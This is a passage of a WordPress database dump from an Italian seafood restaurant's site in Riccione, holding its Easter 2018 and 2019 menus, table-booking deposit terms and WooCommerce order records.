09:35:17','2018-03-10 08:35:17','Tavolo per 2 persone giorno di Pasqua 2018 - anticipo caparra confirmatoria. La caparra si intende per 2 persone (25euro x 2)\n\n<strong>Menù per il pranzo di Pasqua</strong>\n\nTartara di gambero rosa con variazione di carota violetta, rapa rossa e passion fruit\n\nNoci di capasanta con finocchio al lime maionese e polvere di corallo\n\nParmigiana di orata\n\nGarganelli al bianco di canocchie asparagi e zenzero\n\nTrancio di gallinella alla piastra, patata fondente e brodetto\n\nTenerina fondente alla liquirizia, kumquat e mojito\n\n€ 55 a persona bevande escluse\n\nPer i bambini fino a 6 anni possibilitá di ordinare alla carta\n\n da 7 a 14 menù bambini a 25€\nDa 15 anni menù grandi\n\n<strong>Modalità di prenotazione per il pranzo di Pasqua e Pasquetta</strong>\nDi seguito è riportata la disponibilità dei tavoli con la relativa capienza, nel caso in cui non vi siano tavoli relativi al numero di persone richieste, è possibile acquistare più tavoli fino ad ottenere il numero desiderato.\nAnche i bambini occupano il posto, quindi nel caso di 2 adulti e 2 bambini, andrà scelto il tavolo da 4 persone, mentre nel caso di bambini che stanno in carrozzina o passeggino, e non occupano la sedia, va comunicato obbligatoriamente nelle note, onde evitare di non avere lo spazio sufficiente.\nLa scheda va compilata per intero, specificando numero di adulti ed eventuali bambini, e la loro età(la caparra del bambino, se superiore al valore di quanto consumato, sarà utilizzata sull’importo degli adulti),nome di chi consuma il pranzo e numero di cellulare raggiungibile, non che eventuali allergie o intolleranze.\nÈ possibile annullare la prenotazione di tutto il tavolo(LA DISDETTA PARZIALE  E’ A DISCREZIONE DELLA DIREZIONE) e ricevere il rimborso totale della caparra, entro e non oltre le ore 12,00 del venerdi per Pasqua e le 22  per Pasquetta , solo ed esclusivamente mediante telefonata (non saranno considerate valide altre forme di contatto, ne disdette dopo il suddetto orario) al ristorante.\n\nDopo tale data, la caparra pagata diventerà rimborso in caso di no show.\nNel caso in cui le persone arrivate siano meno di quelle prenotate(senza disdetta entro la sopracitata data), le caparre degli assenti non saranno usufruibili dai presenti ma saranno sempre da considerarsi rimborso per no show.\nLa ricevuta del pagamento, vale come conferma di prenotazione\nAcquistando il tavolo si accettano le condizioni sopracitate.\nPer maggiori dettagli, richieste di spiegazioni o necessità varie, potete contattarci telefonicamente al ristorante o alla nostra pagina facebook “ristorante sol y mar – riccione, o all’indirizzo di posta elettronica info@www.ristorantesolymar.it\nGrazie per la comprensione\nTeo & Barbara','Prenotazione Tavolo per 2 Persone - Pasqua','Prenotazione tavolo per 2 persone per il giorno di Pasqua','inherit','closed','closed','','322-autosave-v1','','','2018-03-10 09:35:17','2018-03-10 08:35:17','',322,'http://www.ristorantesolymar.it/2018/03/10/322-autosave-v1/',0,'revision','',0),(627,1,'2018-03-10 09:38:50','2018-03-10 08:38:50','<strong>Menù per il pranzo di Pasqua</strong>\r\n\r\nTartara di gambero rosa con variazione di carota violetta, rapa rossa e passion fruit\r\n\r\nNoci di capasanta con finocchio al lime maionese e polvere di corallo\r\n\r\nParmigiana di orata\r\n\r\nGarganelli al bianco di canocchie asparagi e zenzero\r\n\r\nTrancio di gallinella alla piastra, patata fondente e brodetto\r\n\r\nTenerina fondente alla liquirizia, kumquat e mojito\r\n\r\n€ 55 a persona bevande escluse\r\n\r\nPer i bambini fino a 6 anni possibilitá di ordinare alla carta\r\n\r\nda 7 a 14 menù bambini a 25€\r\nDa 15 anni menù grandi\r\n\r\n[product_pasqua]\r\n\r\n<strong>Pranzo di Pasquetta</strong>\r\nMenù alla carta,\r\nPrenotazione con caparra con le stesse modalità di Pasqua\r\n\r\n[product_pasquetta]\r\n\r\n<strong>Modalità di prenotazione per il pranzo di Pasqua e Pasquetta</strong>\r\nDi seguito è riportata la disponibilità dei tavoli con la relativa capienza, nel caso in cui non vi siano tavoli relativi al numero di persone richieste, è possibile acquistare più tavoli fino ad ottenere il numero desiderato.\r\nAnche i bambini occupano il posto, quindi nel caso di 2 adulti e 2 bambini, andrà scelto il tavolo da 4 persone, mentre nel caso di bambini che stanno in carrozzina o passeggino, e non occupano la sedia, va comunicato obbligatoriamente nelle note, onde evitare di non avere lo spazio sufficiente.\r\nLa scheda va compilata per intero, specificando numero di adulti ed eventuali bambini, e la loro età(la caparra del bambino, se superiore al valore di quanto consumato, sarà utilizzata sull’importo degli adulti),nome di chi consuma il pranzo e numero di cellulare raggiungibile, non che eventuali allergie o intolleranze.\r\nÈ possibile annullare la prenotazione di tutto il tavolo(LA DISDETTA PARZIALE E’ A DISCREZIONE DELLA DIREZIONE) e ricevere il rimborso totale della caparra, entro e non oltre le ore 12,00 del venerdi per Pasqua e le 22 per Pasquetta , solo ed esclusivamente mediante telefonata (non saranno considerate valide altre forme di contatto, ne disdette dopo il suddetto orario) al ristorante.\r\n\r\nDopo tale data, la caparra pagata diventerà rimborso in caso di no show.\r\nNel caso in cui le persone arrivate siano meno di quelle prenotate(senza disdetta entro la sopracitata data), le caparre degli assenti non saranno usufruibili dai presenti ma saranno sempre da considerarsi rimborso per no show.\r\nLa ricevuta del pagamento, vale come conferma di prenotazione\r\nAcquistando il tavolo si accettano le condizioni sopracitate.\r\nPer maggiori dettagli, richieste di spiegazioni o necessità varie, potete contattarci telefonicamente al ristorante o alla nostra pagina facebook “ristorante sol y mar – riccione, o all’indirizzo di posta elettronica info@www.ristorantesolymar.it\r\nGrazie per la comprensione\r\nTeo &amp; Barbara','Menù di Pasqua e Pasquetta 2018','','inherit','closed','closed','','620-revision-v1','','','2018-03-10 09:38:50','2018-03-10 08:38:50','',620,'http://www.ristorantesolymar.it/2018/03/10/620-revision-v1/',0,'revision','',0),(628,1,'2018-03-12 15:27:44','2018-03-12 14:27:44','<strong>Menù per il pranzo di Pasqua</strong>\n\nTartara di gambero rosa con variazione di carota violetta, rapa rossa e passion fruit\n\nNoci di capasanta con finocchio al lime maionese e polvere di corallo\n\nParmigiana di orata\n\nGarganelli al bianco di canocchie asparagi e zenzero\n\nTrancio di gallinella alla piastra, patata fondente e brodetto\n\nTenerina fondente alla liquirizia, kumquat e mojito\n\n€ 55 a persona bevande escluse\n\nPer i bambini fino a 6 anni possibilitá di ordinare alla carta\n\nda 7 a 14 menù bambini a 25€\nDa 15 anni menù grandi\n\n[products category=\"pasqua\" columns=\"4\"]\n\n\n<strong>Pranzo di Pasquetta</strong>\nMenù alla carta,\nPrenotazione con caparra con le stesse modalità di Pasqua\n\n[products category=\"pasquetta\" columns=\"4\"]\n\nModalità di prenotazione per il pranzo di Pasqua e Pasquetta\nDi seguito è riportata la disponibilità dei tavoli con la relativa capienza, nel caso in cui non vi siano tavoli relativi al numero di persone richieste, è possibile acquistare più tavoli fino ad ottenere il numero desiderato.\nAnche i bambini occupano il posto, quindi nel caso di 2 adulti e 2 bambini, andrà scelto il tavolo da 4 persone, mentre nel caso di bambini che stanno in carrozzina o passeggino, e non occupano la sedia, va comunicato obbligatoriamente nelle note, onde evitare di non avere lo spazio sufficiente.\nLa scheda va compilata per intero, specificando numero di adulti ed eventuali bambini, e la loro età(la caparra del bambino, se superiore al valore di quanto consumato, sarà utilizzata sull’importo degli adulti),nome di chi consuma il pranzo e numero di cellulare raggiungibile, non che eventuali allergie o intolleranze.\nÈ possibile annullare la prenotazione di tutto il tavolo(LA DISDETTA PARZIALE  E’ A DISCREZIONE DELLA DIREZIONE) e ricevere il rimborso totale della caparra, entro e non oltre le ore 12,00 del venerdi per Pasqua e le 22  per Pasquetta , solo ed esclusivamente mediante telefonata (non saranno considerate valide altre forme di contatto, ne disdette dopo il suddetto orario) al ristorante.\n\n Dopo tale data, la caparra pagata diventerà rimborso in caso di no show.\nNel caso in cui le persone arrivate siano meno di quelle prenotate(senza disdetta entro la sopracitata data), le caparre degli assenti non saranno usufruibili dai presenti ma saranno sempre da considerarsi rimborso per no show.\nLa ricevuta del pagamento, vale come conferma di prenotazione\nAcquistando il tavolo si accettano le condizioni sopracitate.\nPer maggiori dettagli, richieste di spiegazioni o necessità varie, potete contattarci telefonicamente al ristorante o alla nostra pagina facebook “ristorante sol y mar – riccione, o all’indirizzo di posta elettronica info@www.ristorantesolymar.it\nGrazie per la comprensione\nTeo & Barbara','Menù di Pasqua e Pasquetta 2018','','inherit','closed','closed','','620-autosave-v1','','','2018-03-12 15:27:44','2018-03-12 14:27:44','',620,'http://www.ristorantesolymar.it/2018/03/10/620-autosave-v1/',0,'revision','',0),(629,1,'2018-03-10 09:40:27','2018-03-10 08:40:27','<strong>Menù per il pranzo di Pasqua</strong>\r\n\r\nTartara di gambero rosa con variazione di carota violetta, rapa rossa e passion fruit\r\n\r\nNoci di capasanta con finocchio al lime maionese e polvere di corallo\r\n\r\nParmigiana di orata\r\n\r\nGarganelli al bianco di canocchie asparagi e zenzero\r\n\r\nTrancio di gallinella alla piastra, patata fondente e brodetto\r\n\r\nTenerina fondente alla liquirizia, kumquat e mojito\r\n\r\n€ 55 a persona bevande escluse\r\n\r\nPer i bambini fino a 6 anni possibilitá di ordinare alla carta\r\n\r\nda 7 a 14 menù bambini a 25€\r\nDa 15 anni menù grandi\r\n\r\n[products category=\"pasqua\"]\r\n\r\n\r\n<strong>Pranzo di Pasquetta</strong>\r\nMenù alla carta,\r\nPrenotazione con caparra con le stesse modalità di Pasqua\r\n\r\n[products category=\"pasquetta\"]\r\n\r\n<strong>Modalità di prenotazione per il pranzo di Pasqua e Pasquetta</strong>\r\nDi seguito è riportata la disponibilità dei tavoli con la relativa capienza, nel caso in cui non vi siano tavoli relativi al numero di persone richieste, è possibile acquistare più tavoli fino ad ottenere il numero desiderato.\r\nAnche i bambini occupano il posto, quindi nel caso di 2 adulti e 2 bambini, andrà scelto il tavolo da 4 persone, mentre nel caso di bambini che stanno in carrozzina o passeggino, e non occupano la sedia, va comunicato obbligatoriamente nelle note, onde evitare di non avere lo spazio sufficiente.\r\nLa scheda va compilata per intero, specificando numero di adulti ed eventuali bambini, e la loro età(la caparra del bambino, se superiore al valore di quanto consumato, sarà utilizzata sull’importo degli adulti),nome di chi consuma il pranzo e numero di cellulare raggiungibile, non che eventuali allergie o intolleranze.\r\nÈ possibile annullare la prenotazione di tutto il tavolo(LA DISDETTA PARZIALE E’ A DISCREZIONE DELLA DIREZIONE) e ricevere il rimborso totale della caparra, entro e non oltre le ore 12,00 del venerdi per Pasqua e le 22 per Pasquetta , solo ed esclusivamente mediante telefonata (non saranno considerate valide altre forme di contatto, ne disdette dopo il suddetto orario) al ristorante.\r\n\r\nDopo tale data, la caparra pagata diventerà rimborso in caso di no show.\r\nNel caso in cui le persone arrivate siano meno di quelle prenotate(senza disdetta entro la sopracitata data), le caparre degli assenti non saranno usufruibili dai presenti ma saranno sempre da considerarsi rimborso per no show.\r\nLa ricevuta del pagamento, vale come conferma di prenotazione\r\nAcquistando il tavolo si accettano le condizioni sopracitate.\r\nPer maggiori dettagli, richieste di spiegazioni o necessità varie, potete contattarci telefonicamente al ristorante o alla nostra pagina facebook “ristorante sol y mar – riccione, o all’indirizzo di posta elettronica info@www.ristorantesolymar.it\r\nGrazie per la comprensione\r\nTeo &amp; Barbara','Menù di Pasqua e Pasquetta 2018','','inherit','closed','closed','','620-revision-v1','','','2018-03-10 09:40:27','2018-03-10 08:40:27','',620,'http://www.ristorantesolymar.it/2018/03/10/620-revision-v1/',0,'revision','',0),(630,1,'2018-03-10 09:43:45','2018-03-10 08:43:45','<img src=\"https://www.ristorantesolymar.it/wp-content/uploads/2019/04/happy-easter-300x300.jpg\" alt=\"happy easter\" width=\"300\" height=\"300\" class=\"alignright size-medium wp-image-786\" />Tavolo per 6 persone giorno di Pasqua 2019 - anticipo caparra confirmatoria. La caparra si intende per 6 persone (30euro x 6)\r\n\r\n<strong>Pranzo di Pasqua</strong>\r\n<em>Tartara  di ricciola cocco, zenzero e passion fruit\r\n\r\nRossetti fritti e salmorejo\r\n\r\nMazzancolle nostrane, asparagi e pompelmo rosa\r\n\r\nCappelletti ai carciofi con canocchie e pomodorini\r\n\r\nFiletto di ombrina all\'arancio e crema di sedano rapa\r\n\r\nNuvola soffice e croccante, panna cotta alla menta e zuppetta di fragole\r\n\r\n60€ a persona bevande escluse</em>\r\n\r\nPer i bambini fino a 6 anni possibilitá di ordinare alla carta\r\nda 7 a 14 menù bambini a 30€\r\nDa 15 anni menù grandi\r\n\r\n\r\n<strong>Modalità di prenotazione per il pranzo di Pasqua e Pasquetta</strong>\r\nDi seguito è riportata la disponibilità dei tavoli con la relativa capienza, nel caso in cui non vi siano tavoli relativi al numero di persone richieste, è possibile acquistare più tavoli fino ad ottenere il numero desiderato. Anche i bambini occupano il posto, quindi nel caso di 2 adulti e 2 bambini, andrà scelto il tavolo da 4 persone, mentre nel caso di bambini che stanno in carrozzina o passeggino, e non occupano la sedia, va comunicato obbligatoriamente nelle note, onde evitare di non avere lo spazio sufficiente. La scheda va compilata per intero, specificando numero di adulti ed eventuali bambini, e la loro età(la caparra del bambino, se superiore al valore di quanto consumato, sarà utilizzata sull’importo degli adulti),nome di chi consuma il pranzo e numero di cellulare raggiungibile, non che eventuali allergie o intolleranze. È possibile annullare la prenotazione di tutto il tavolo(LA DISDETTA PARZIALE E’ A DISCREZIONE DELLA DIREZIONE) e ricevere il rimborso totale della caparra, entro e non oltre le ore 12,00 del venerdi per Pasqua e le 22 per Pasquetta , solo ed esclusivamente mediante telefonata (non saranno considerate valide altre forme di contatto, ne disdette dopo il suddetto orario) al ristorante. Dopo tale data, la caparra pagata diventerà rimborso in caso di no show. Nel caso in cui le persone arrivate siano meno di quelle prenotate (senza disdetta entro la sopracitata data), le caparre degli assenti non \r\nsaranno usufruibili dai presenti ma saranno sempre da considerarsi rimborso per no show. La ricevuta del pagamento, vale come conferma di prenotazione. Acquistando il tavolo si accettano le condizioni sopracitate.\r\nPer maggiori dettagli, richieste di spiegazioni o necessità varie, potete contattarci telefonicamente al ristorante o alla nostra pagina facebook “ristorante sol y mar – riccione, o all’indirizzo di posta elettronica info@ristorantesolymar.it\r\nGrazie per la comprensione\r\nTeo &amp; Barbara\r\n','Prenotazione Tavolo per 6 Persone - Pasqua','Tavolo per 6 persone giorno di Pasqua 2019 - anticipo caparra confirmatoria. La caparra si intende per 6 persone (30euro x 6)','publish','closed','closed','','prenotazione-tavolo-per-6-persone-pasqua','','','2019-04-19 19:49:46','2019-04-19 17:49:46','',0,'http://www.ristorantesolymar.it/?post_type=product&#038;p=630',1,'product','',0),(631,1,'2018-03-10 09:47:56','2018-03-10 08:47:56','<img src=\"https://www.ristorantesolymar.it/wp-content/uploads/2019/04/happy-easter-300x300.jpg\" alt=\"\" width=\"300\" height=\"300\" class=\"alignright size-medium wp-image-786\" />Tavolo per 8 persone giorno di Pasqua 2019 - anticipo caparra confirmatoria. La caparra si intende per 8 persone (30euro x 8)\r\n\r\n<strong>Pranzo di Pasqua</strong>\r\n<em>Tartara  di ricciola cocco, zenzero e passion fruit\r\n\r\nRossetti fritti e salmorejo\r\n\r\nMazzancolle nostrane, asparagi e pompelmo rosa\r\n\r\nCappelletti ai carciofi con canocchie e pomodorini\r\n\r\nFiletto di ombrina all\'arancio e crema di sedano rapa\r\n\r\nNuvola soffice e croccante, panna cotta alla menta e zuppetta di fragole\r\n\r\n60€ a persona bevande escluse</em>\r\n\r\nPer i bambini fino a 6 anni possibilitá di ordinare alla carta\r\nda 7 a 14 menù bambini a 30€\r\nDa 15 anni menù grandi\r\n\r\n\r\n<strong>Modalità di prenotazione per il pranzo di Pasqua e Pasquetta</strong>\r\nDi seguito è riportata la disponibilità dei tavoli con la relativa capienza, nel caso in cui non vi siano tavoli relativi al numero di persone richieste, è possibile acquistare più tavoli fino ad ottenere il numero desiderato. Anche i bambini occupano il posto, quindi nel caso di 2 adulti e 2 bambini, andrà scelto il tavolo da 4 persone, mentre nel caso di bambini che stanno in carrozzina o passeggino, e non occupano la sedia, va comunicato obbligatoriamente nelle note, onde evitare di non avere lo spazio sufficiente. La scheda va compilata per intero, specificando numero di adulti ed eventuali bambini, e la loro età(la caparra del bambino, se superiore al valore di quanto consumato, sarà utilizzata sull’importo degli adulti),nome di chi consuma il pranzo e numero di cellulare raggiungibile, non che eventuali allergie o intolleranze. È possibile annullare la prenotazione di tutto il tavolo(LA DISDETTA PARZIALE E’ A DISCREZIONE DELLA DIREZIONE) e ricevere il rimborso totale della caparra, entro e non oltre le ore 12,00 del venerdi per Pasqua e le 22 per Pasquetta , solo ed esclusivamente mediante telefonata (non saranno considerate valide altre forme di contatto, ne disdette dopo il suddetto orario) al ristorante. Dopo tale data, la caparra pagata diventerà rimborso in caso di no show. Nel caso in cui le persone arrivate siano meno di quelle prenotate (senza disdetta entro la sopracitata data), le caparre degli assenti non \r\nsaranno usufruibili dai presenti ma saranno sempre da considerarsi rimborso per no show. La ricevuta del pagamento, vale come conferma di prenotazione. Acquistando il tavolo si accettano le condizioni sopracitate.\r\nPer maggiori dettagli, richieste di spiegazioni o necessità varie, potete contattarci telefonicamente al ristorante o alla nostra pagina facebook “ristorante sol y mar – riccione, o all’indirizzo di posta elettronica info@ristorantesolymar.it\r\nGrazie per la comprensione\r\nTeo &amp; Barbara\r\n','Prenotazione Tavolo per 8 Persone - Pasqua','Tavolo per 8 persone giorno di Pasqua 2019 - anticipo caparra confirmatoria. La caparra si intende per 8 persone (30euro x 8)\r\n','publish','closed','closed','','prenotazione-tavolo-per-8-persone-pasqua','','','2019-04-04 21:32:32','2019-04-04 19:32:32','',0,'http://www.ristorantesolymar.it/?post_type=product&#038;p=631',1,'product','',0),(632,1,'2018-03-10 09:49:45','2018-03-10 08:49:45','<strong>Menù per il pranzo di Pasqua</strong>\r\n\r\nTartara di gambero rosa con variazione di carota violetta, rapa rossa e passion fruit\r\n\r\nNoci di capasanta con finocchio al lime maionese e polvere di corallo\r\n\r\nParmigiana di orata\r\n\r\nGarganelli al bianco di canocchie asparagi e zenzero\r\n\r\nTrancio di gallinella alla piastra, patata fondente e brodetto\r\n\r\nTenerina fondente alla liquirizia, kumquat e mojito\r\n\r\n€ 55 a persona bevande escluse\r\n\r\nPer i bambini fino a 6 anni possibilitá di ordinare alla carta\r\n\r\nda 7 a 14 menù bambini a 25€\r\nDa 15 anni menù grandi\r\n\r\n[products category=\"pasqua\" columns=\"4\"]\r\n\r\n\r\n<strong>Pranzo di Pasquetta</strong>\r\nMenù alla carta,\r\nPrenotazione con caparra con le stesse modalità di Pasqua\r\n\r\n[products category=\"pasquetta\" columns=\"4\"]\r\n\r\n<strong>Modalità di prenotazione per il pranzo di Pasqua e Pasquetta</strong>\r\nDi seguito è riportata la disponibilità dei tavoli con la relativa capienza, nel caso in cui non vi siano tavoli relativi al numero di persone richieste, è possibile acquistare più tavoli fino ad ottenere il numero desiderato.\r\nAnche i bambini occupano il posto, quindi nel caso di 2 adulti e 2 bambini, andrà scelto il tavolo da 4 persone, mentre nel caso di bambini che stanno in carrozzina o passeggino, e non occupano la sedia, va comunicato obbligatoriamente nelle note, onde evitare di non avere lo spazio sufficiente.\r\nLa scheda va compilata per intero, specificando numero di adulti ed eventuali bambini, e la loro età(la caparra del bambino, se superiore al valore di quanto consumato, sarà utilizzata sull’importo degli adulti),nome di chi consuma il pranzo e numero di cellulare raggiungibile, non che eventuali allergie o intolleranze.\r\nÈ possibile annullare la prenotazione di tutto il tavolo(LA DISDETTA PARZIALE E’ A DISCREZIONE DELLA DIREZIONE) e ricevere il rimborso totale della caparra, entro e non oltre le ore 12,00 del venerdi per Pasqua e le 22 per Pasquetta , solo ed esclusivamente mediante telefonata (non saranno considerate valide altre forme di contatto, ne disdette dopo il suddetto orario) al ristorante.\r\n\r\nDopo tale data, la caparra pagata diventerà rimborso in caso di no show.\r\nNel caso in cui le persone arrivate siano meno di quelle prenotate(senza disdetta entro la sopracitata data), le caparre degli assenti non saranno usufruibili dai presenti ma saranno sempre da considerarsi rimborso per no show.\r\nLa ricevuta del pagamento, vale come conferma di prenotazione\r\nAcquistando il tavolo si accettano le condizioni sopracitate.\r\nPer maggiori dettagli, richieste di spiegazioni o necessità varie, potete contattarci telefonicamente al ristorante o alla nostra pagina facebook “ristorante sol y mar – riccione, o all’indirizzo di posta elettronica info@www.ristorantesolymar.it\r\nGrazie per la comprensione\r\nTeo &amp; Barbara','Menù di Pasqua e Pasquetta 2018','','inherit','closed','closed','','620-revision-v1','','','2018-03-10 09:49:45','2018-03-10 08:49:45','',620,'http://www.ristorantesolymar.it/2018/03/10/620-revision-v1/',0,'revision','',0),(633,1,'2018-03-10 09:49:56','2018-03-10 08:49:56','<img src=\"https://www.ristorantesolymar.it/wp-content/uploads/2019/04/happy-easter-300x300.jpg\" alt=\"happy easter\" width=\"300\" height=\"300\" class=\"alignright size-medium wp-image-786\" />Tavolo per 7 persone giorno di Pasquetta 2019 - anticipo caparra confirmatoria. La caparra si intende per 7 persone (30euro x 7)\r\n\r\n<strong>Pranzo di Pasquetta</strong>\r\n<em>Tartara  di ricciola cocco, zenzero e passion fruit\r\n\r\nRossetti fritti e salmorejo\r\n\r\nMazzancolle nostrane, asparagi e pompelmo rosa\r\n\r\nCappelletti ai carciofi con canocchie e pomodorini\r\n\r\nFiletto di ombrina all\'arancio e crema di sedano rapa\r\n\r\nNuvola soffice e croccante, panna cotta alla menta e zuppetta di fragole\r\n\r\n60€ a persona bevande escluse</em>\r\n\r\nPer i bambini fino a 6 anni possibilitá di ordinare alla carta\r\nda 7 a 14 menù bambini a 30€\r\nDa 15 anni menù grandi\r\n\r\n\r\n<strong>Modalità di prenotazione per il pranzo di Pasqua e Pasquetta</strong>\r\nDi seguito è riportata la disponibilità dei tavoli con la relativa capienza, nel caso in cui non vi siano tavoli relativi al numero di persone richieste, è possibile acquistare più tavoli fino ad ottenere il numero desiderato. Anche i bambini occupano il posto, quindi nel caso di 2 adulti e 2 bambini, andrà scelto il tavolo da 4 persone, mentre nel caso di bambini che stanno in carrozzina o passeggino, e non occupano la sedia, va comunicato obbligatoriamente nelle note, onde evitare di non avere lo spazio sufficiente. La scheda va compilata per intero, specificando numero di adulti ed eventuali bambini, e la loro età(la caparra del bambino, se superiore al valore di quanto consumato, sarà utilizzata sull’importo degli adulti),nome di chi consuma il pranzo e numero di cellulare raggiungibile, non che eventuali allergie o intolleranze. È possibile annullare la prenotazione di tutto il tavolo(LA DISDETTA PARZIALE E’ A DISCREZIONE DELLA DIREZIONE) e ricevere il rimborso totale della caparra, entro e non oltre le ore 12,00 del venerdi per Pasqua e le 22 per Pasquetta , solo ed esclusivamente mediante telefonata (non saranno considerate valide altre forme di contatto, ne disdette dopo il suddetto orario) al ristorante. Dopo tale data, la caparra pagata diventerà rimborso in caso di no show. Nel caso in cui le persone arrivate siano meno di quelle prenotate (senza disdetta entro la sopracitata data), le caparre degli assenti non \r\nsaranno usufruibili dai presenti ma saranno sempre da considerarsi rimborso per no show. La ricevuta del pagamento, vale come conferma di prenotazione. Acquistando il tavolo si accettano le condizioni sopracitate.\r\nPer maggiori dettagli, richieste di spiegazioni o necessità varie, potete contattarci telefonicamente al ristorante o alla nostra pagina facebook “ristorante sol y mar – riccione, o all’indirizzo di posta elettronica info@ristorantesolymar.it\r\nGrazie per la comprensione\r\nTeo & Barbara\r\n','Prenotazione Tavolo per 7 Persone - Pasquetta','Tavolo per 7 persone giorno di Pasquetta - anticipo caparra confirmatoria. La caparra si intende per 7 persone (30euro x 7)','publish','closed','closed','','prenotazione-tavolo-per-7-persone-pasquetta-2','','','2019-04-03 22:19:30','2019-04-03 20:19:30','',0,'http://www.ristorantesolymar.it/?post_type=product&#038;p=633',1,'product','',0),(634,1,'2018-03-10 11:58:00','2018-03-10 10:58:00','','Order &ndash; marzo 10, 2018 @ 11:58 AM','','wc-cancelled','open','closed','order_5aa3ba38b992a','ordine-mar-10-2018-1058-am','','','2018-03-10 12:36:24','2018-03-10 11:36:24','',0,'http://www.ristorantesolymar.it/?post_type=shop_order&#038;p=634',0,'shop_order','',1),(635,1,'2018-03-10 12:24:24','2018-03-10 11:24:24','','Order &ndash; marzo 10, 2018 @ 12:24 PM','','wc-cancelled','open','closed','order_5aa3c0681bf1f','ordine-mar-10-2018-1124-am','','','2018-03-10 13:29:22','2018-03-10 12:29:22','',0,'http://www.ristorantesolymar.it/?post_type=shop_order&#038;p=635',0,'shop_order','',1),(636,1,'2018-03-10 12:30:10','2018-03-10 11:30:10','','Order &ndash; marzo 10, 2018 @ 12:30 PM','','wc-cancelled','open','closed','order_5aa3c1c22fbeb','ordine-mar-10-2018-1130-am','','','2018-03-10 13:29:22','2018-03-10 12:29:22','',0,'http://www.ristorantesolymar.it/?post_type=shop_order&#038;p=636',0,'shop_order','',1),(637,1,'2018-03-10 12:35:18','2018-03-10 11:35:18','','Order &ndash; marzo 10, 2018 @ 12:35 PM','','wc-cancelled','open','closed','order_5aa3c2f6a39a4','ordine-mar-10-2018-1135-am','','','2018-03-10 13:29:22','2018-03-10 12:29:22','',0,'http://www.ristorantesolymar.it/?post_type=shop_order&#038;p=637',0,'shop_order','',1),(638,1,'2018-03-10 12:39:17','2018-03-10 11:39:17','','Order &ndash; marzo 10, 2018 @ 12:39 PM','','wc-processing','open','closed','order_5aa3c3e507a36','ordine-mar-10-2018-1139-am','','','2018-03-10 12:40:14','2018-03-10 11:40:14','',0,'http://www.ristorantesolymar.it/?post_type=shop_order&#038;p=638',0,'shop_order','',4),(639,1,'2018-03-10 12:40:31','2018-03-10 11:40:31','','Order &ndash; marzo 10, 2018 @ 12:40 PM','','wc-cancelled','open','closed','order_5aa3c42f2cf39','ordine-mar-10-2018-1140-am','','','2018-03-10 13:29:22','2018-03-10 12:29:22','',0,'http://www.ristorantesolymar.it/?post_type=shop_order&#038;p=639',0,'shop_order','',1),(640,1,'2018-03-10 13:42:54','2018-03-10 12:42:54','','Order &ndash; marzo 10, 2018 @ 01:42 PM','','wc-processing','open','closed','order_5aa3d2ce970dd','ordine-mar-10-2018-1242-pm','','','2018-03-10 13:46:45','2018-03-10 12:46:45','',0,'http://www.ristorantesolymar.it/?post_type=shop_order&#038;p=640',0,'shop_order','',3),(641,1,'2018-03-12 14:26:37','2018-03-12 13:26:37','','Order &ndash; marzo 12, 2018 @ 02:26 PM','','wc-processing','open','closed','order_5aa6800dc343d','ordine-mar-12-2018-0126-pm','','','2018-03-12 14:54:59','2018-03-12 13:54:59','',0,'http://www.ristorantesolymar.it/?post_type=shop_order&#038;p=641',0,'shop_order','',3),(642,1,'2018-03-12 15:27:47','2018-03-12 14:27:47','<strong>Menù per il pranzo di Pasqua</strong>\r\n\r\nTartara di gambero rosa con variazione di carota violetta, rapa rossa e passion fruit\r\n\r\nNoci di capasanta con finocchio al lime maionese e polvere di corallo\r\n\r\nParmigiana di orata\r\n\r\nGarganelli al bianco di canocchie asparagi e zenzero\r\n\r\nTrancio di gallinella alla piastra, patata fondente e brodetto\r\n\r\nTenerina fondente alla liquirizia, kumquat e mojito\r\n\r\n€ 55 a persona bevande escluse\r\n\r\nPer i bambini fino a 6 anni possibilitá di ordinare alla carta\r\n\r\nda 7 a 14 menù bambini a 25€\r\nDa 15 anni menù grandi\r\n\r\n[products category=\"pasqua\" columns=\"4\"]\r\n\r\n\r\n<strong>Pranzo di Pasquetta</strong>\r\nMenù alla carta,\r\nPrenotazione con caparra con le stesse modalità di Pasqua\r\n\r\n[products category=\"pasquetta\" columns=\"4\"]\r\n\r\nModalità di prenotazione per il pranzo di Pasqua e Pasquetta\r\nDi seguito è riportata la disponibilità dei tavoli con la relativa capienza, nel caso in cui non vi siano tavoli relativi al numero di persone richieste, è possibile acquistare più tavoli fino ad ottenere il numero desiderato.\r\nAnche i bambini occupano il posto, quindi nel caso di 2 adulti e 2 bambini, andrà scelto il tavolo da 4 persone, mentre nel caso di bambini che stanno in carrozzina o passeggino, e non occupano la sedia, va comunicato obbligatoriamente nelle note, onde evitare di non avere lo spazio sufficiente.\r\nLa scheda va compilata per intero, specificando numero di adulti ed eventuali bambini, e la loro età(la caparra del bambino, se superiore al valore di quanto consumato, sarà utilizzata sull’importo degli adulti),nome di chi consuma il pranzo e numero di cellulare raggiungibile, non che eventuali allergie o intolleranze.\r\nÈ possibile annullare la prenotazione di tutto il tavolo(LA DISDETTA PARZIALE  E’ A DISCREZIONE DELLA DIREZIONE) e ricevere il rimborso totale della caparra, entro e non oltre le ore 12,00 del venerdi per Pasqua e le 22  per Pasquetta , solo ed esclusivamente mediante telefonata (non saranno considerate valide altre forme di contatto, ne disdette dopo il suddetto orario) al ristorante.\r\n\r\n Dopo tale data, la caparra pagata diventerà rimborso in caso di no show.\r\nNel caso in cui le persone arrivate siano meno di quelle prenotate(senza disdetta entro la sopracitata data), le caparre degli assenti non saranno usufruibili dai presenti ma saranno sempre da considerarsi rimborso per no show.\r\nLa ricevuta del pagamento, vale come conferma di prenotazione\r\nAcquistando il tavolo si accettano le condizioni sopracitate.\r\nPer maggiori dettagli, richieste di spiegazioni o necessità varie, potete contattarci telefonicamente al ristorante o alla nostra pagina facebook “ristorante sol y mar – riccione, o all’indirizzo di posta elettronica info@www.ristorantesolymar.it\r\nGrazie per la comprensione\r\nTeo & Barbara','Menù di Pasqua e Pasquetta 2018','','inherit','closed','closed','','620-revision-v1','','','2018-03-12 15:27:47','2018-03-12 14:27:47','',620,'http://www.ristorantesolymar.it/2018/03/12/620-revision-v1/',0,'revision','',0),(643,1,'2018-03-13 10:51:15','2018-03-13 09:51:15','','Order &ndash; marzo 13, 2018 @ 10:51 AM','','wc-processing','open','closed','order_5aa79f13900e3','ordine-mar-13-2018-0951-am','','','2018-03-13 10:51:52','2018-03-13 09:51:52','',0,'http://www.ristorantesolymar.it/?post_type=shop_order&#038;p=643',0,'shop_order','',3),(644,1,'2019-04-03 22:09:00','2019-04-03 20:09:00','<strong>Pranzo di 